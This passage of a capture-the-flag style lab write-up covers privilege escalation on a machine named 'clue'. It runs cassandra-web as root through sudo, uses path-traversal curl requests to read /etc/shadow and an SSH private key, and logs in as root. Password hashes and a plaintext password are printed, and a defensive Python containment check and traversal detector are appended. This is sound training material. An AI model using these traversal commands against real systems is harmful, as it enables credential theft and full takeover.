sudo privileges
The cassie user has sudo privileges to execute the /usr/local/bin/cassandra-web command as anyone without being prompted for a password. We have already established that the target's cassandra-web instance is vulnerable to remote file read. If I could start an instance as the root account, I should be able to read any file on the target system by leveraging the vulnerability.
cassie@clue:~$ sudo /usr/local/bin/cassandra-web -u cassie -p SecondBiteTheApple330 -B 0.0.0.0:30000
I, [2025-03-25T17:43:00.681498 #1883] INFO -- : Establishing control connection
I, [2025-03-25T17:43:00.759219 #1883] INFO -- : Refreshing connected host's metadata
I, [2025-03-25T17:43:00.762583 #1883] INFO -- : Completed refreshing connected host's metadata
I, [2025-03-25T17:43:00.763126 #1883] INFO -- : Refreshing peers metadata
I, [2025-03-25T17:43:00.764096 #1883] INFO -- : Completed refreshing peers metadata
I, [2025-03-25T17:43:00.764124 #1883] INFO -- : Refreshing schema
I, [2025-03-25T17:43:00.787663 #1883] INFO -- : Schema refreshed
I, [2025-03-25T17:43:00.787701 #1883] INFO -- : Control connection established
I, [2025-03-25T17:43:00.787874 #1883] INFO -- : Creating session
I, [2025-03-25T17:43:00.928542 #1883] INFO -- : Session created
2025-03-25 17:43:00 -0400 Thin web server (v1.8.1 codename Infinite Smoothie)
2025-03-25 17:43:00 -0400 Maximum connections set to 1024
2025-03-25 17:43:00 -0400 Listening on 0.0.0.0:30000, CTRL+C to stop
It seems to have worked.
cassie@clue:~$ ps -auxww | grep -i cassandra-web
cassie 1845 0.2 1.4 621088 29552 ? Ssl 17:42 0:00 /usr/bin/ruby2.5 /usr/local/bin/cassandra-web -u cassie -p SecondBiteTheApple330
root 1882 0.0 0.1 10192 4064 pts/0 S<+ 17:43 0:00 sudo /usr/local/bin/cassandra-web -u cassie -p SecondBiteTheApple330 -B 0.0.0.0:30000
root 1883 0.3 1.4 382460 28824 pts/0 S<l+ 17:43 0:00 /usr/bin/ruby2.5 /usr/local/bin/cassandra-web -u cassie -p SecondBiteTheApple330 -B 0.0.0.0:30000
It worked. Besides the original instance running on port 3000, there is another instance running with the privileges of the root account on port 30000.
From within
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ curl -I http://clue.pg:30000/
However, I cannot reach the application due to the firewall.
cassie@clue:~$ curl -I localhost:30000
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Content-Length: 3837
Vary: Origin
Connection: keep-alive
Server: thin
But I can reach it from within the target system.
/etc/shadow
cassie@clue:~$ curl localhost:30000/../../../../../../../../../../etc/shadow --path-as-is
root:$6$kuXiAC8PIOY2uis9$LrTzlkYSlY485ZREBLW5iPSpNxamM38BL85BPmaIAWp05VlV.tdq0EryiFLbLryvbsGTx50dLnMsxIk7PJB5P1:19209:0:99999:7:::
daemon:*:18555:0:99999:7:::
bin:*:18555:0:99999:7:::
sys:*:18555:0:99999:7:::
sync:*:18555:0:99999:7:::
games:*:18555:0:99999:7:::
man:*:18555:0:99999:7:::
lp:*:18555:0:99999:7:::
mail:*:18555:0:99999:7:::
news:*:18555:0:99999:7:::
uucp:*:18555:0:99999:7:::
proxy:*:18555:0:99999:7:::
www-data:*:18555:0:99999:7:::
backup:*:18555:0:99999:7:::
list:*:18555:0:99999:7:::
irc:*:18555:0:99999:7:::
gnats:*:18555:0:99999:7:::
nobody:*:18555:0:99999:7:::
_apt:*:18555:0:99999:7:::
systemd-timesync:*:18555:0:99999:7:::
systemd-network:*:18555:0:99999:7:::
systemd-resolve:*:18555:0:99999:7:::
messagebus:*:18555:0:99999:7:::
sshd:*:18555:0:99999:7:::
systemd-coredump:!!:18555::::::
ntp:*:19209:0:99999:7:::
cassandra:!:19209:0:99999:7:::
cassie:$6$/WeFDwP1CNIN34/z$9woKSLSZhgHw1mX3ou90wnR.i5LHEfeyfHbxu7nYmaZILVrbhHrSeHNGqV0WesuQWGIL7DHEwHKOLK6UX79DI0:19209:0:99999:7:::
freeswitch:!:19209::::::
anthony:$6$01NV0gAhVLOnUHb0$byLv3N95fqVvhut9rbsrYOVzi8QseWfkFl7.VDQ.26a.0IkEVR2TDXoTv/KCMLjUOQZMMpkTUdC3WIyqSWQ.Y1:19209:0:99999:7:::
Leveraging the vulnerability, I can read the /etc/shadow file.
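As an added defender-side example (not code from this writeup or from the cassandra-web project), this shows the containment check that the traversal above bypasses, plus a small detector that flags traversal requests in constructed access-log lines. WEB_ROOT and the log format are assumptions made for the example.

```python
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Assumed location of the static files the web app serves (constructed).
WEB_ROOT = "/srv/cassandra-web/public"

# Constructed access-log lines in common log format; the second and third
# mimic the kind of request used in the writeup (plain and percent-encoded).
SAMPLE_LOG = [
    '127.0.0.1 - - [25/Mar/2025:17:45:10 -0400] "GET / HTTP/1.1" 200 3837',
    '127.0.0.1 - - [25/Mar/2025:17:45:31 -0400] "GET /../../../../../../../../../../etc/shadow HTTP/1.1" 200 1489',
    '127.0.0.1 - - [25/Mar/2025:17:46:02 -0400] "GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 2311',
]

def resolve_static_path(web_root: str, request_path: str) -> Optional[str]:
    """Map a request path onto web_root, or return None if it escapes the root.

    Percent-decoding happens before normalisation so that %2e%2e cannot
    slip past the check. The remote file read in the writeup works because
    the raw path is joined to the root without this containment test.
    (A production handler would additionally resolve symlinks via realpath.)
    """
    decoded = unquote(request_path)
    root = os.path.normpath(web_root)
    candidate = os.path.normpath(os.path.join(root, decoded.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate

# Matches literal "../" and its percent-encoded forms, case-insensitively.
TRAVERSAL = re.compile(r"(\.\./|%2e%2e(/|%2f))", re.IGNORECASE)
LOG_LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def flag_traversal_requests(lines: List[str]) -> List[Tuple[str, str, int]]:
    """Return (client, path, status) for every request whose path contains
    a traversal sequence; a 200 on such a request is the strongest signal
    that the read succeeded and should be triaged first."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, _method, path, status = m.groups()
        if TRAVERSAL.search(path):
            hits.append((client, path, int(status)))
    return hits
```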
SSH Private Key
cassie@clue:~$ curl localhost:30000/../../../../../../../../../../root/.ssh/id_rsa --path-as-is
Unfortunately, there is no SSH private key for the root account.
cassie@clue:~$ curl localhost:30000/../../../../../../../../../../home/anthony/.ssh/id_rsa --path-as-is
-----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----
But there is one for the anthony user.
SSH
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ ssh anthony@$IP -i ./id_rsa.anthony
anthony@192.168.220.240's password:
It doesn't work. The SSH private key doesn't belong to the anthony user.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ ssh root@$IP -i ./id_rsa.anthony
Linux clue 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 25 17:34:20 2025 from 192.168.45.192
root@clue:~# whoami
root
root@clue:~# hostname
clue
root@clue:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:c3:e4 brd ff:ff:ff:ff:ff:ff
inet 192.168.220.240/24 brd 192.168.220.255 scope global ens192
valid_lft forever preferred_lft forever
It belonged to the root user.
System level compromise